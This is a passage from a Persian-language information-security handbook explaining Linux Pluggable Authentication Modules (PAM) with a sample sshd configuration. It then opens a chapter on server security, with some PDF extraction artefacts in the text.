،pam_ldapﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺑﺮﺧﻼﻑ pam_ldap ،libnss_ldapﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ LDAPﺗﻨﻬﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻛﺎﺭﺑﺮ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺩﻳﮕـﺮﻱ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻧﻤـﻲﻧﻤﺎﻳـﺪ .ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ LDAPﺷـﻤﺎ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﻲ ﺍﺿـﺎﻓﻪ
nis.schemaﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ،ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ LDAPﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﻛﻨﺘﺮﻝﺷﺪﻩ ﺑﻮﺳـﻴﻠﺔ ،PAMﺑـﻪ ﺳـﺎﺩﮔ ﹺ
ﻛﺮﺩﻥ ﻳﻚ ﺧﻂ ﺑﻪ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ PAMﺁﻥ ﺍﺳﺖ ،ﻛﻪ pam_ldap.soﺭﺍ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ،ﻭ
ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺑﻌﻨﻮﺍﻥ "ﻛﺎﻓﻲ" ﻣﺸﺨﺺ ﻛﻨﺪ.
ﻣﺎﺟﻮﻝﻫﺎﻱ ﻗﺎﺑﻞ ﺍﺗﺼﺎﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﻚ ﺷﻴﻮﺓ ﻳﻜﺘﺎ ﺩﺍﺷﺘﻪ
ﺑﺎﺷﻴﻢ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺳﻴﺴﺘﻢ ﻣﺎﺟﻮﻟﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺗﺼﺎﻝ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
) (PAMsﻳﻚ ﺭﻭﺵ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺍﺳﺖ PAM .ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﻮﺳﻴﻠﺔ SUNﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺁﻥ ﺑﺮﺍﻱ ،Free BSD ،Solarisﻭ
ﺑﺨﺼﻮﺹ Linuxﺑﻴﺸﺘﺮﻳﻦ PAMﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ PAM .ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻭ ﻳﻚ ﻭﺍﺳﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﻫﺮ ﺑﺮﻧﺎﻣﺔ
ﻛﺎﺭﺑﺮﺩﻱ ﺑﺠﺎﻱ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﻫﺮ ﺳﻴـﺴﺘﻢ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﻪ PAMﺁﻧـﺮﺍ
ﻣﻲﺷﻨﺎﺳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺎﺟﻮﻝ PAMﻭ ﺩﺭ ﻋﻤﻞ ﺑﺼﻮﺭﺕ ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﺔ ﻣﺸﺘﺮﮎ -ﻛﻪ ﺑﺼﻮﺭﺕ ﺩﻳﻨﺎﻣﻴﻜﻲ ﺑﺎﺭﮔﺬﺍﺭﻱﺷﺪﻩ -ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ
ﺷﺪﻩ ﺍﺳﺖ .ﻣﺎﺟﻮﻟﻬﺎﻱ PAMﺍﺯ ﻃﺮﻕ ﺯﻳﺮ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ:
• ﻓﺎﻳﻠﻬﺎﻱ etc/passwdﻳﺎ etc/shadow؛
• NISﻳﺎ NIS+؛
١٨٨
)185 Application Programming Interface (API
186 Name Service Switch
۱۸۷ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ libnss-ldapﺑﻪ ﺻﻔﺤﺎﺕ ۴۵۰ﺗﺎ ۴۵۳ﮐﺘﺎﺏ PUISﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
188 Pluggable Authentication Modules
٣٤٥
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
•
LDAP؛
•
Kerberos 4ﻳﺎ Kerberos 5؛ ﻭ
ﻳﻚ ﻓﺎﻳﻞ ﺩﻟﺨﻮﺍﻩ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ .Berkeley
•
١٨٩
ﻫﺮ ﺳﺮﻭﻳﺲ ﺁﺷﻨﺎ ﺑﺎ PAMﻳﺎ ﺩﺭ ﻓﺎﻳﻞ /etc/pam.confﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﻣﻌﻤﻮﻝﺗﺮ ﺩﺭ ﻓﺎﻳﻞ ﺧﻮﺩﺵ ﺩﺭ ﻣﺴﻴﺮ /etc/pam.dﭘﻴﻜﺮﺑﻨـﺪﻱ
ﻣﻲﺷﻮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ،ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ PAMﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ sshﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ،Linuxﻓﺎﻳـﻞ /etc/pam.d/sshdﺍﺳـﺖ.
ﻼ ﻣﺜـﺎﻟﻲ
ﻳﻚ ﺳﺮﻭﻳﺲ ﺑﻨﺎﻡ " "otherﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺶﻓﺮﺿﻬﺎ ﺑﻪ ﺧﺪﻣﺎﺕ ﺁﺷﻨﺎ ﺑﺎ PAMﻛﻪ ﺻﺮﺍﺣﺘﹰﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩﺍﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺫﻳـ ﹰ
ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ PAMﺑﺮﺍﻱ sshdﺭﻭﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Linuxﺁﻣﺪﻩ ﺍﺳﺖ:
auth required /lib/security/pam_env.so
auth sufficient /lib/security/pam_unix.so
auth required /lib/security/pam_deny.so
account required /lib/security/pam_unix.so
password required /lib/security/pam_cracklib.so retry=3
password sufficient /lib/security/pam_unix.so nullok use_authtok md5 shadow
password required /lib/security/pam_deny.so
session required /lib/security/pam_limits.so
session required /lib/security/pam_unix.so
ﺐ ﺩﺍﺩﻩﺷﺪﻩ ﺩﻧﺒﺎﻝ ﻣﻲﺷـﻮﺩ .ﻣﺎﺟﻮﻟﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺎ
ﺧﻄﻮﻁ " "authﺭﻭﺍﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ ،ﻛﻪ ﺑﻪ ﺗﺮﺗﻴ ﹺ
") "requiredﻻﺯﻡ( ﻣﺸﺨﺺ ﺷﺪﻩﺍﻧﺪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷﻮﻧﺪ -ﻭ ﺍﮔﺮ ﺩﺭ ﺍﺟﺮﺍ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺷﻮﻧﺪ ،ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﻧﺸﺪﻩ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺍﻭ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﮔﺮﺩﺩ .ﻣﻲﺗﻮﺍﻥ ﻣﺎﺟﻮﻟﻬﺎﻱ " "requiredﺭﺍ ﺑﺼﻮﺭﺕ ﭼﻨﺪﮔﺎﻧـﻪ ﺗﻌﺮﻳـﻒ
ﻛﺮﺩ ﻛﻪ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﻛﻠﻴﺔ ﻣﺎﺟﻮﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷﻮﻧﺪ .ﻣﺎﺟﻮﻟﻬﺎﻳﻲ ﻛـﻪ ﺑـﺎ ") "sufficientﻛـﺎﻓﻲ( ﻣـﺸﺨﺺ ﺷـﺪﻩﺍﻧـﺪ،
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺟﺮﺍﻳﺸﺎﻥ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ ﻭ ﺭﻭﺍﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺧﺎﺗﻤﻪ ﻣﻲﺩﻫﻨﺪ.
ﺍﻳﻦ ﻓﺎﻳﻞ ﺧﺎﺹ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻫﻤﭽﻨﻴﻦ ﻫﻤﺔ ﻗﻮﺍﻧﻴﻦ ﺳﻴﺴﺘﻢ ﻣﺒﻨﻲ ﺑﺮ ﻣﺴﻦ ﻳﺎ ﻣﻨﻘﻀﻲ ﺷﺪﻥ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﺪ ،ﻭ ﺑـﺮﺍﻱ
ﻣﻨﺎﺑﻊ ﺩﺭ ﻧﺸﺴﺖ sshdﻛﺎﺭﺑﺮ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﺍﮔﺮ sshdﻗﺎﺑﻠﻴﺖ ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺍﻳﻦ ﻓﺎﻳـﻞ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺍﺯ
ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻗﺎﺑﻞ ﺣﺪﺱ ﺯﺩﻥ ﺑﺎﺷـﺪ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ ﻣـﻲﻛﻨـﺪ ،ﻭ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺩﺭ
/etc/shadowﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺗﺎﺑﻊ ﺭﻣﺰﻧﮕﺎﺭﻱ MD5ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﺪ.
ﺯﻳﺮﺳﻴﺴﺘﻢ PAMﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﭼﻨﺪ ﺻﻮﺭﺕ ﻣﺨﺘﻠﻒ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ
ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺩﻭ ﻳﺎ ﺳﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﻛﺮﺩ ١٩٠،ﻳﻚ ﺭﻭﺵ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ﺗﺮﻛﻴﺐ ﻧﻤﻮﺩ ،ﻭ ﻳﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﻣـﺎﻥ ﺭﻭﺯ
۱۸۹ﺍﮔﺮ ﺍﻳﻦ ﻻﻳﻪﻫﺎ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ ،ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ SMTPﺩﺭ Sendmailﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻨﺪﻭﻗﻬﺎﻱ ﭘـﺴﺘﻲ
ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ،Cyrus imapdﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ) Cyrus SASLﻻﻳـﺔ ﺳـﺎﺩﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ ﺍﻣﻨﻴـﺖ،
(security layerﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺎ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺠﺰﺍ ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ PAMﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ! ﻏﻴﺮﻗﺎﺑﻞ ﺗﺼﻮﺭ ﻧﻴﺴﺖ ﻛﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺗﺼﺎﻝ imapﻳﻚ ﻛﺎﺭﺑﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ SASLﻣﺒﺘﻨﻲ ﺑﺮ PAMﻣﺒﺘﻨﻲ ﺑﺮ LDAPﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
simple authentication and
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺩﺭ ﺍﻳــﻦ ﻣﺜــﺎﻝ ﺍﻭﻟــﻴﻦ ﻣــﺎﺟﻮﻟﻲ ﻛــﻪ ﺍﺟــﺮﺍ ﻣــﻲﺷــﻮﺩ pam_envﺍﺳــﺖ ﻛــﻪ ﺑــﺼﻮﺭﺕ ﺍﺧﺘﻴــﺎﺭﻱ ﻣﺘﻐﻴﺮﻫــﺎﻱ ﻣﺤﻴﻄــﻲ ﺭﺍ ﺩﺭ
ﻦ ﻣﻘﺪﺍﺭ ﻳﺎ ﭘﺎﻙ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻣﺎﺟﻮﻝ "ﻻﺯﻡ" ﺍﺳﺖ -ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷـﻮﺩ ﺗـﺎ
/etc/security/pam_env.confﺗﻌﻴﻴ ﹺ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺍﻧﺠﺎﻡ ﺑﺮﺳﺪ .ﻣﺎﺟﻮﻝ ﺍﺟﺮﺍ ﺷﻮﻧﺪﺓ ﺑﻌﺪﻱ pam_unixﺍﺳﺖ ﻛﻪ ﺑـﺎ ﻓﺎﻳﻠﻬـﺎﻱ ﺭﻣـﺰ ﻋﺒـﻮﺭ /etc/passwd - Unixﻭ
- etc/shadowﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ .ﺍﮔﺮ ﺍﻳﻦ ﻋﻤﻠﻴﺎﺕ ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛـﺎﺭﺑﺮ ﻛـﺎﻓﻲ
ﺍﺳﺖ ﻭ ﺭﻭﺍﻝ ﻛﺎﻣﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺁﺧﺮﻳﻦ ﻣﺎﺟﻮﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ pam_denyﺍﺳﺖ ﻛﻪ ﻓﻘﻂ ﺑﻪ ﺷﻜﺴﺖ ﻣﻲﺍﻧﺠﺎﻣﺪ ﺗﺎ ﺑـﻪ ﺭﻭﺍﻝ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﻧﺎﻣﻮﻓﻖ ﭘﺎﻳﺎﻥ ﺩﻫﺪ.
٣٤٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺰ ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ.
PAMﺑﻪ ﺭﺍﻫﺒﺮ ﺗﻮﺍﻧﺎﻳﻲ ﺍﻧﺘﺨﺎﺏ ﺳﻴﺎﺳﺖ ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺑﻬﺘﺮﻳﻦ ﻧﺤﻮ ،ﻣﺨﺎﻃﺮﻩ ﻭ ﻓﻨﺎﻭﺭﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺗﻄﺒﻴـﻖ
ﺩﻫﺪ.
- PAMﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﺭﻭﺷﻦ ﻛﺮﺩﻧﺪ -ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﻫﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺻﺮﻓﹰﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ .ﻳﻜـﻲ ﺍﺯ ﻧﻘـﺎﻁ
ﻗﻮﺕ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺭﻭﺷﻨﻲ ﭼﻬﺎﺭ ﻓﺎﺯ ﻭ ﺭﻭﺍﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﻣﻲﻛﻨﺪ :ﺍﺭﺯﻳﺎﺑﻲ ﺍﻳﻨﻜﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺳﺮﻭﻳﺲ ﻣﻮﺭﺩ ﻧﻈﺮ ،ﺩﺭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ ،ﻭ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺩﺍﺭﺩ )ﻓـﺎﺯ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ( ،ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮ )ﻓـﺎﺯ ﺗـﺼﺪﻳﻖ(،
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﺳﺎﻳﺮ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺍﻳﻨﻜﺎﺭ ﻻﺯﻡ ﺑﺎﺷﺪ )ﻓﺎﺯ ﺭﻣﺰ ﻋﺒﻮﺭ( ،ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻭ ﺍﺯ ﻛـﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ
ﻧﺸﺴﺖ ﻛﺎﺭﺑﺮ )ﻓﺎﺯ ﻧﺸﺴﺖ( ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﻭ ﺍﻳﺠﺎﺩ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﻣﻤﻴﺰﻱ ﻫﻢ ﺑﺎﺷﺪ.
۱۹۰ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ ﺍﻳﻦ ﻳﻚ ﻣﺴﺌﻠﻪ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ .ﺍﻳﻦ ﺭﻭﺵ ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻔﺎﻭﺕ ﺗﺨﺼﻴﺺ ﻳﺎﻓﺘﻪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ
ﻣﻔﻴﺪ ﺑﺎﺷﺪ ،ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻫﺮ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻪ ﺩﻭ ﻧﻔﺮ ﻳﺎ ﺑﻴﺸﺘﺮ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻳﻚ ﺩﻧﺒﺎﻟﻪ "ﺷﺎﻫﺪ ﺑﻮﺩﻥ" ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ.
٣٤٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺷﺸﻢ
ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﻛﻠﻴﺎﺕ
ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺼﻮﺭﺕ ﻋـﺎﻡ ،ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺳـﺖ ﻛـﻪ ﻣﻴﺰﺑـﺎﻧﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﺩ ﻭ ﺍﻳـﻦ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
ﺧﺪﻣﺎﺕ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ ﻭ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﺭﺍ
ﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ
ﺗﺸﺮﻳﺢ ﻣﻲﻛﻨﻴﻢ .ﺍﻳﻦ ﻓﺼﻞ ﺍﺑﺘﺪﺍ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ ١٩١ﻭ ﺳﭙﺲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘ ﹺ
